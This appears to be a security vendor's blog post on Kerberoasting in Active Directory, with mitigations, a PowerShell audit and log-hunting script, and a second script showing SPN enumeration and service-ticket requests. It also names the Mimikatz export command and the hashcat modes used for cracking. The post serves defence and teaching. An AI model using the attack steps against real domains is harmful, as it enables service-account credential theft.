Kerberoasting: a hidden threat to your business
No one disputes the importance of cybersecurity for business continuity any more. This reality means that organisations have to be particularly alert to “unwelcome surprises”. One such surprise is Kerberoasting.
Kerberoasting is an attack against service accounts in Active Directory. It does not exploit a bug in Kerberos but a property of the protocol as Windows implements it: any authenticated domain user can request a service ticket for any service registered with a Service Principal Name (SPN), and part of that ticket is encrypted with a key derived from the service account’s password. The attacker requests such tickets, takes them off the network and, with freely available cracking tools, tries candidate passwords until one decrypts the ticket; the domain controller never sees these guesses, so no lockout occurs. If the ticket was issued with the legacy RC4-HMAC encryption type, the key is simply the NT hash of the password and cracking is fast. With the recovered password the attacker logs on as the service account, which is frequently over-privileged, and moves on from there.
What are the risks of Kerberoasting?
The consequences of a Kerberoasting attack can be serious for an organisation. Among the most relevant are:
- Unauthorised access: Attackers can gain access to confidential systems and data.
- Privilege escalation: Attackers can use the stolen credentials to escalate their privileges and gain full control over the network.
- Extortion: Attackers can use the data they obtain to make demands of the company.
- Damage to reputation: A security breach can cause irreparable damage to the organisation’s reputation.
How do I protect Active Directory from Kerberoasting?
To protect your Active Directory against Kerberoasting, it is essential to adopt the following measures:
- Strong passwords for service accounts: The ticket is only as strong as the password of the account that owns the SPN, so it is the service accounts, not ordinary users, that matter here. Give them long, random and unique passwords (25 characters or more) or, better, move the service to a Group Managed Service Account (gMSA), whose 120-character password Active Directory rotates automatically.
- Disabling RC4 for Kerberos: RC4 is an encryption type, not a protocol. Set msDS-SupportedEncryptionTypes on service accounts so that only AES128/AES256 are offered, and enforce this domain-wide with the “Network security: Configure encryption types allowed for Kerberos” policy. Legacy applications that only support RC4 must be identified first, and an account only has AES keys if its password was set after AES was enabled, so a password reset may be needed.
- Least privilege: Service accounts should not be members of Domain Admins or other privileged groups; grant each account only the rights the service needs, so that a cracked ticket does not hand over the whole domain.
- Log monitoring: Watch Event ID 4769 (Kerberos service ticket requested) on the domain controllers. A roasting run looks like one user requesting tickets for many user-account SPNs in a short time, typically with TicketEncryptionType 0x17 (RC4). An account with a decoy SPN that no legitimate client uses makes a cheap, high-confidence alert.
- Security updates: Keep operating systems and applications up to date with the latest security patches.
- Training, training, training: Sensitising employees to security risks and best practices for protecting company information.
- Network segmentation: Dividing the network into smaller segments, limiting the impact of a possible attack.
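The audit and the log check that the list above calls for, as an added example (not Eurotux’s code): the first part lists every enabled account that can be roasted and whether its tickets would be issued with RC4; the second part pulls Event 4769 from a domain controller and groups RC4 service-ticket requests by requester. It assumes a domain-joined host, read access to the DC’s Security log, a domain controller named dc01 and a service account named svc_sql; those names are assumptions. Thresholds in the hunting query are starting points, not tuned values.

```powershell
# Added example, not Eurotux's code: audit Kerberoastable accounts and hunt for roasting.
# Assumed names: 'dc01' (domain controller) and 'svc_sql' (a flagged service account).

# --- 1. Which accounts can be roasted, and how cheaply? -----------------------------
# Any enabled user object with a servicePrincipalName is a target for every domain user.
$searcher = [adsisearcher]'(&(objectCategory=user)(servicePrincipalName=*)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
$searcher.PageSize = 1000
[void]$searcher.PropertiesToLoad.AddRange(@('samaccountname','msds-supportedencryptiontypes','pwdlastset','admincount'))

$audit = foreach ($r in $searcher.FindAll()) {
    $p = $r.Properties
    # msDS-SupportedEncryptionTypes is a bit mask: 0x4 = RC4, 0x8 = AES128, 0x10 = AES256.
    # When it is absent on a user account the KDC issues RC4 service tickets for it.
    $enc = if ($p['msds-supportedencryptiontypes'].Count -gt 0) { [int]$p['msds-supportedencryptiontypes'][0] } else { 0 }
    $pwdSet = [datetime]::FromFileTime([long]$p['pwdlastset'][0])
    [pscustomobject]@{
        Account         = [string]$p['samaccountname'][0]
        RC4Tickets      = (($enc -band 0x18) -eq 0)      # no AES bit set -> RC4-HMAC (etype 23)
        PasswordAgeDays = (New-TimeSpan -Start $pwdSet -End (Get-Date)).Days
        Privileged      = ($p['admincount'].Count -gt 0 -and [int]$p['admincount'][0] -eq 1)
    }
}
$audit | Sort-Object Privileged, RC4Tickets, PasswordAgeDays -Descending | Format-Table -AutoSize

# Remediation for a flagged account (requires the RSAT ActiveDirectory module):
#   Set-ADUser svc_sql -KerberosEncryptionType AES128,AES256
#   Set-ADAccountPassword svc_sql -Reset     # AES keys are only derived when the password is set
# Better still, migrate the service to a gMSA so the password is long and rotated for you.

# --- 2. Hunting: RC4 service-ticket requests in the DC Security log -------------------
# Event 4769 is written on the DC for every TGS request. A roasting run appears as one
# requester asking for tickets to many user-account SPNs with TicketEncryptionType 0x17.
$events = Get-WinEvent -ComputerName dc01 -FilterHashtable @{
    LogName = 'Security'; Id = 4769; StartTime = (Get-Date).AddHours(-24)
}

$requests = foreach ($e in $events) {
    $data = @{}
    foreach ($d in ([xml]$e.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    [pscustomobject]@{
        Time    = $e.TimeCreated
        Caller  = $data['TargetUserName']
        Service = $data['ServiceName']
        Etype   = $data['TicketEncryptionType']
        Client  = $data['IpAddress']
        Status  = $data['Status']
    }
}

$requests |
    Where-Object { $_.Status -eq '0x0' -and $_.Etype -eq '0x17' -and
                   $_.Service -notlike '*$' -and $_.Service -ne 'krbtgt' } |  # skip computer accounts and TGT renewals
    Group-Object Caller, Client |
    Where-Object Count -ge 5 |          # threshold: tune to the environment
    Sort-Object Count -Descending |
    Select-Object Count, Name, @{n='Services'; e={ ($_.Group.Service | Sort-Object -Unique) -join ', ' }}
```

The audit deliberately reads msDS-SupportedEncryptionTypes rather than trusting group policy alone, because that attribute is what the KDC consults per account. In the hunting query, vulnerability scanners and some monitoring agents also generate bursts of 4769 events; whitelist their source addresses rather than raising the threshold, and treat any 4769 for a decoy SPN as an alert regardless of count.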
Eurotux can help
At Eurotux, we offer a wide range of services to protect your Active Directory environment, including:
- Vulnerability analysis: We identify the vulnerabilities in your environment and offer solutions to mitigate them.
- Implementation of security controls: We implement robust security controls to protect your Active Directory against attacks such as Kerberoasting.
- Continuous management: We continuously monitor your environment to detect and respond to threats in real time.
Don’t let Kerberoasting compromise your organisation’s security. Contact Eurotux and find out how we can help you protect your data and guarantee the continuity of your business.
How does Kerberoasting work?
In a typical Kerberoasting attack:
- The attacker enumerates SPNs and the accounts that own them. This is an LDAP query that any authenticated user may run, for example with PowerShell or setspn -Q */*, so it needs no special rights. SPNs of type MSSQLSvc are a favourite target because they belong to SQL Server accounts, which are often privileged and sit next to data worth stealing.
- For each interesting SPN the attacker requests a service ticket from the domain controller, which issues it without checking whether the requester will ever contact the service. The attacker then extracts the ticket from memory and saves its encrypted portion in a format a cracking tool understands.
- Cracking happens entirely offline: the tool tries candidate passwords until one decrypts the ticket. No further contact with the domain controller is needed, so account lockout and failed-logon events offer no protection at this stage.
- Once the password is recovered, the attacker authenticates as the service account, which is often more privileged than the service requires.
- With that account the attacker escalates privileges, reads confidential data or carries out other malicious activity.
- A compromised service account usually gives access to the servers it runs on, and with them to the credentials of other users logged on there. The attacker repeats the same technique from each new foothold.
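The first two steps of the procedure above, as an added example (not Eurotux’s code), run the way any authenticated domain user could run them from a domain-joined workstation: an LDAP query for MSSQLSvc SPNs, then a service-ticket request through the .NET KerberosRequestorSecurityToken class, and a look at the cached ticket to see which encryption type the KDC used. The host sql01.corp.example and its SPN are assumptions; substitute one returned by step 1.

```powershell
# Added example, not Eurotux's code: enumerate SPNs and request a service ticket.
# 'MSSQLSvc/sql01.corp.example:1433' is an assumed SPN; use one from the enumeration below.

# Step 1 - enumerate SPNs. Every domain user can read these attributes, so no special
# rights are needed. The page's SQL example corresponds to MSSQLSvc/* SPNs.
$searcher = [adsisearcher]'(&(objectCategory=user)(servicePrincipalName=MSSQLSvc/*))'
[void]$searcher.PropertiesToLoad.AddRange(@('samaccountname','serviceprincipalname','memberof'))
$targets = foreach ($r in $searcher.FindAll()) {
    [pscustomobject]@{
        Account = [string]$r.Properties['samaccountname'][0]
        SPNs    = @($r.Properties['serviceprincipalname'])
        Groups  = @($r.Properties['memberof'])   # a privileged group here is what the attacker hopes to see
    }
}
$targets | Format-List

# Step 2 - ask the KDC for a service ticket. Constructing the token performs the
# TGS-REQ; the resulting ticket is stored in the logon session's ticket cache.
# The KDC does not check whether we will ever connect to the service.
Add-Type -AssemblyName System.IdentityModel
$spn   = 'MSSQLSvc/sql01.corp.example:1433'
$token = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $spn

# Show the cached ticket. The line to read is 'KerbTicket Encryption Type':
# 'RSADSI RC4-HMAC(NT)' means the encrypted part is protected with the service
# account's NT hash and cracks quickly; 'AES-256-CTS-HMAC-SHA1-96' is far slower.
klist | Select-String -Pattern $spn -Context 0,4
```

The encrypted portion of that cached ticket is what tools such as Mimikatz (kerberos::list /export) or Rubeus write out in the $krb5tgs$23$ format that hashcat cracks with mode 13100; AES tickets use modes 19600 and 19700 and cost several orders of magnitude more per guess. Each ticket request in step 2 produces a 4769 event on the domain controller, which is the only trace the attack leaves until the cracked password is used.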